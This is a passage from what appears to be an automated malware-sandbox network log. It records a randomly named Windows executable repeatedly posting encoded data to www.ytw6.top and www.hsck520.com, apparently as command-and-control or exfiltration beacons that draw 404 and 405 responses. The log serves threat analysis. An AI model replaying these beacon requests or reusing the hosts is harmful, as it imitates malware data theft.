Jul 5, 2024 03:25:17.434107065 CEST	742	OUT	POST /rmef/ HTTP/1.1 Host: www.ytw6.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.ytw6.top Referer: http://www.ytw6.top/rmef/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 5a 66 67 5a 4f 5a 59 44 4e 2f 71 45 7a 33 47 33 52 31 55 31 48 38 35 74 41 2b 78 54 58 68 2b 7a 2b 71 56 51 71 73 6f 4e 33 53 36 72 41 48 48 2f 56 69 4c 6c 59 49 4d 35 4b 35 2b 35 4f 4d 39 2b 4b 56 2b 44 71 73 6a 72 70 69 7a 56 58 44 36 77 35 53 70 52 59 51 67 73 38 54 53 76 42 2b 47 46 35 49 78 6c 6e 5a 6a 64 58 74 4a 62 2f 43 37 5a 2b 63 62 41 39 62 2b 7a 69 6c 76 64 62 6c 41 43 4f 6a 56 6b 4f 32 51 79 46 6a 36 67 4c 32 4b 69 2f 66 35 63 46 62 55 54 47 4f 75 72 67 75 52 78 47 73 6e 44 59 69 78 48 54 54 37 64 4f 32 70 42 36 52 33 71 42 4a 53 53 47 53 48 4e 64 49 34 47 48 77 3d 3d Data Ascii: 9TND4h=ZfgZOZYDN/qEz3G3R1U1H85tA+xTXh+z+qVQqsoN3S6rAHH/ViLlYIM5K5+5OM9+KV+DqsjrpizVXD6w5SpRYQgs8TSvB+GF5IxlnZjdXtJb/C7Z+cbA9b+zilvdblACOjVkO2QyFj6gL2Ki/f5cFbUTGOurguRxGsnDYixHTT7dO2pB6R3qBJSSGSHNdI4GHw==
Jul 5, 2024 03:25:19.070519924 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 05 Jul 2024 01:25:18 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jul 5, 2024 03:25:19.070586920 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 05 Jul 2024 01:25:18 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jul 5, 2024 03:25:19.070596933 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 05 Jul 2024 01:25:18 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	52676	38.47.232.224	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:25:19.972876072 CEST	762	OUT	POST /rmef/ HTTP/1.1 Host: www.ytw6.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.ytw6.top Referer: http://www.ytw6.top/rmef/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 5a 66 67 5a 4f 5a 59 44 4e 2f 71 45 31 58 32 33 54 53 6f 31 57 73 35 75 4d 65 78 54 4f 78 2b 76 2b 71 52 51 71 74 73 6e 33 68 65 72 41 6e 33 2f 45 57 66 6c 4e 49 4d 35 65 70 2b 6c 41 73 39 68 4b 56 43 4c 71 75 48 72 70 69 58 56 58 42 69 77 35 6a 70 53 59 41 67 71 33 7a 53 74 4d 65 47 46 35 49 78 6c 6e 5a 6e 37 58 73 68 62 2b 33 7a 5a 76 4e 62 42 68 4c 2b 38 68 6c 76 64 4d 31 41 47 4f 6a 56 61 4f 79 59 4d 46 6e 4b 67 4c 33 57 69 2f 4e 42 64 65 4c 56 57 49 75 76 69 68 38 6b 56 4f 75 69 32 61 46 5a 72 65 54 72 51 4c 77 34 62 72 67 57 39 54 4a 32 68 62 56 4f 35 51 4c 46 50 63 38 45 38 43 69 61 75 4e 70 49 32 2b 41 39 4b 2b 55 48 44 36 63 30 3d Data Ascii: 9TND4h=ZfgZOZYDN/qE1X23TSo1Ws5uMexTOx+v+qRQqtsn3herAn3/EWflNIM5ep+lAs9hKVCLquHrpiXVXBiw5jpSYAgq3zStMeGF5IxlnZn7Xshb+3zZvNbBhL+8hlvdM1AGOjVaOyYMFnKgL3Wi/NBdeLVWIuvih8kVOui2aFZreTrQLw4brgW9TJ2hbVO5QLFPc8E8CiauNpI2+A9K+UHD6c0=
Jul 5, 2024 03:25:20.911397934 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 05 Jul 2024 01:25:20 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	52677	38.47.232.224	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:25:22.503922939 CEST	10844	OUT	POST /rmef/ HTTP/1.1 Host: www.ytw6.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.ytw6.top Referer: http://www.ytw6.top/rmef/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 5a 66 67 5a 4f 5a 59 44 4e 2f 71 45 31 58 32 33 54 53 6f 31 57 73 35 75 4d 65 78 54 4f 78 2b 76 2b 71 52 51 71 74 73 6e 33 68 57 72 42 55 50 2f 56 45 33 6c 66 34 4d 35 43 5a 2b 6d 41 73 38 37 4b 56 61 50 71 75 4c 52 70 67 66 56 59 43 71 77 2f 52 42 53 4c 67 67 71 71 6a 53 73 42 2b 47 71 35 49 67 74 6e 59 58 37 58 73 68 62 2b 32 44 5a 76 63 62 42 78 37 2b 7a 69 6c 76 61 62 6c 41 2b 4f 69 38 68 4f 79 56 35 46 55 43 67 46 7a 32 69 36 34 56 64 44 62 56 55 4c 75 76 36 68 38 34 4b 4f 75 2f 4a 61 41 6c 46 65 52 33 51 4c 45 4e 38 30 42 75 53 47 35 69 6a 4f 46 36 4a 66 71 78 4c 51 74 41 62 4a 79 32 68 52 62 49 34 2f 77 51 63 69 6d 6a 6d 35 4d 31 78 67 61 76 50 57 66 52 54 2b 38 53 75 70 41 41 4a 30 61 4c 78 73 32 65 57 5a 78 55 64 73 4a 63 4c 6e 38 78 76 73 77 45 67 58 7a 77 33 48 72 4c 52 6b 58 46 66 45 73 54 34 70 68 72 66 64 50 58 4b 69 7a 49 72 46 35 4b 6a 69 6d 57 63 50 2f 2f 50 64 46 2b 6a 46 4b 35 34 37 65 2f 38 55 51 58 6b 57 76 52 5a 30 58 34 74 6b 6b 6c 38 64 63 50 45 56 66 4d [TRUNCATED] Data Ascii: 9TND4h=ZfgZOZYDN/qE1X23TSo1Ws5uMexTOx+v+qRQqtsn3hWrBUP/VE3lf4M5CZ+mAs87KVaPquLRpgfVYCqw/RBSLggqqjSsB+Gq5IgtnYX7Xshb+2DZvcbBx7+zilvablA+Oi8hOyV5FUCgFz2i64VdDbVULuv6h84KOu/JaAlFeR3QLEN80BuSG5ijOF6JfqxLQtAbJy2hRbI4/wQcimjm5M1xgavPWfRT+8SupAAJ0aLxs2eWZxUdsJcLn8xvswEgXzw3HrLRkXFfEsT4phrfdPXKizIrF5KjimWcP//PdF+jFK547e/8UQXkWvRZ0X4tkkl8dcPEVfM0fWVv6DvYriqmdhrPXWC1QJI9tYNUSfOHaEAaJiIvcI7k3S0Z8ERGa0855MrXLqxzhueI3TNf+L5ak26XqQ6C1HLOviA0+gptvuKBr5TvdzUb3y5U0fss/zyrP4HslrKtop+TfUQwwkEzbwEzS42j2Uv8N7ofk4X9tQvFZ559XFQFdF4Ft3gy0MJzTJcZ8vDWPNYVSpanfw2o8zjKK/39nO3W+TQb825tVqJihfnu1gpCs0XswdV6s5jLNcs9nJI18ojZ14NuoiM1cMvGWYQrD0jfaVPmD3P0pboz4fsFo6n4xRtwdoj7kiBDcuEw/FV+hzvXTlHETwIJ60XHUgBbyXk2TGiHRQS1qAPufj737quvs304+boP0Mc4enYIzrzGzzQUBnrz5Nk1Roz+HxBs41VZVCsKwaBA8TS1kDnr5dyb2J5Hog/TbVulW3b8IEssXEql2GNh955ZbEOsMf6geLqoWyFlQkkEPlcTqvuSuRNQ2QtcakzTmzYN+iWzF8T01aakYqiRaYbnSwxKmr5by5MD2BX5dVfHwUR1v1teVRIuLaQjwOCCz5uUM3r6vbjMCbOyodvLY/P1ZD8bllgE2HtvNqOHduoj5oT/kFVGZYJDOvG6TmDJL+KhlNdVUXOTLFLEgLbxKgpy6l+FsbQSH9OnAOrVGoZf+ [TRUNCATED]
Jul 5, 2024 03:25:23.439352036 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 05 Jul 2024 01:25:23 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	52678	38.47.232.224	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:25:25.040218115 CEST	486	OUT	GET /rmef/?9TND4h=UdI5Nug9LeCq3QKyZxAFTuhDHYNaCA3T0/tR5L8b4jWaA2fUCVH3fLw1ebDEBIsiTWaLxfrgjTz4bD/84RJrNmZZ6yqPN++//ptV/K/4BOxQ2TPEoKO+wL0=&MXOD=nDFLlbM87h HTTP/1.1 Host: www.ytw6.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jul 5, 2024 03:25:25.965384960 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 05 Jul 2024 01:25:25 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	52679	35.190.52.58	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:25:39.522625923 CEST	751	OUT	POST /2e2r/ HTTP/1.1 Host: www.hsck520.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.hsck520.com Referer: http://www.hsck520.com/2e2r/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 35 63 47 6f 59 2b 54 36 44 56 79 77 34 30 78 45 6d 71 76 72 69 2b 37 39 4e 42 52 39 6b 79 74 42 39 58 38 63 77 6c 43 74 6a 45 57 61 43 42 64 7a 67 78 36 55 68 4f 68 68 39 38 6f 73 42 4b 49 56 59 66 6c 2b 6a 30 64 79 68 52 6d 50 54 33 67 63 4d 6d 6c 72 39 74 71 5a 45 74 54 72 73 69 4f 36 6d 57 75 75 45 78 49 41 4d 58 68 55 77 4e 57 46 33 38 67 72 39 4d 7a 49 41 46 68 64 47 78 48 43 43 73 57 41 64 34 66 74 32 72 62 61 66 67 64 6e 44 6e 52 78 6e 2f 66 75 70 56 2f 47 4d 5a 66 41 39 43 65 45 47 55 70 4c 4d 38 67 39 75 32 6c 57 78 39 32 45 78 52 74 35 37 35 77 59 4c 6f 67 6e 33 41 3d 3d Data Ascii: 9TND4h=5cGoY+T6DVyw40xEmqvri+79NBR9kytB9X8cwlCtjEWaCBdzgx6UhOhh98osBKIVYfl+j0dyhRmPT3gcMmlr9tqZEtTrsiO6mWuuExIAMXhUwNWF38gr9MzIAFhdGxHCCsWAd4ft2rbafgdnDnRxn/fupV/GMZfA9CeEGUpLM8g9u2lWx92ExRt575wYLogn3A==
Jul 5, 2024 03:25:40.191385031 CEST	176	IN	HTTP/1.1 405 Method Not Allowed Server: nginx/1.20.2 Date: Fri, 05 Jul 2024 01:25:40 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close
Jul 5, 2024 03:25:40.195285082 CEST	559	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	52680	35.190.52.58	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:25:42.054600954 CEST	771	OUT	POST /2e2r/ HTTP/1.1 Host: www.hsck520.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.hsck520.com Referer: http://www.hsck520.com/2e2r/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 35 63 47 6f 59 2b 54 36 44 56 79 77 34 55 68 45 6b 4a 33 72 71 2b 37 2b 42 68 52 39 74 53 73 49 39 58 77 63 77 6b 32 39 67 33 79 61 43 68 74 7a 68 77 36 55 79 2b 68 68 70 73 6f 74 4f 71 49 61 59 66 6f 44 6a 77 5a 79 68 56 47 50 54 33 77 63 4d 52 4a 71 39 39 71 62 52 39 54 6c 6f 69 4f 36 6d 57 75 75 45 78 63 71 4d 58 35 55 77 39 47 46 32 64 67 6f 77 73 7a 4a 51 56 68 64 58 68 48 47 43 73 57 6d 64 35 7a 48 32 6f 6a 61 66 6c 5a 6e 44 32 52 32 79 50 66 6f 6d 31 2b 65 63 59 71 76 7a 53 6a 6c 4c 6b 68 36 46 65 38 6b 76 77 30 4d 67 4d 58 54 6a 52 4a 4b 6d 2b 35 73 47 72 64 75 73 45 44 73 4b 2f 54 69 76 45 56 4a 51 4e 44 32 74 4c 36 6b 49 51 34 3d Data Ascii: 9TND4h=5cGoY+T6DVyw4UhEkJ3rq+7+BhR9tSsI9Xwcwk29g3yaChtzhw6Uy+hhpsotOqIaYfoDjwZyhVGPT3wcMRJq99qbR9TloiO6mWuuExcqMX5Uw9GF2dgowszJQVhdXhHGCsWmd5zH2ojaflZnD2R2yPfom1+ecYqvzSjlLkh6Fe8kvw0MgMXTjRJKm+5sGrdusEDsK/TivEVJQND2tL6kIQ4=
Jul 5, 2024 03:25:42.728585005 CEST	176	IN	HTTP/1.1 405 Method Not Allowed Server: nginx/1.20.2 Date: Fri, 05 Jul 2024 01:25:42 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close
Jul 5, 2024 03:25:42.731800079 CEST	559	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	52681	35.190.52.58	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
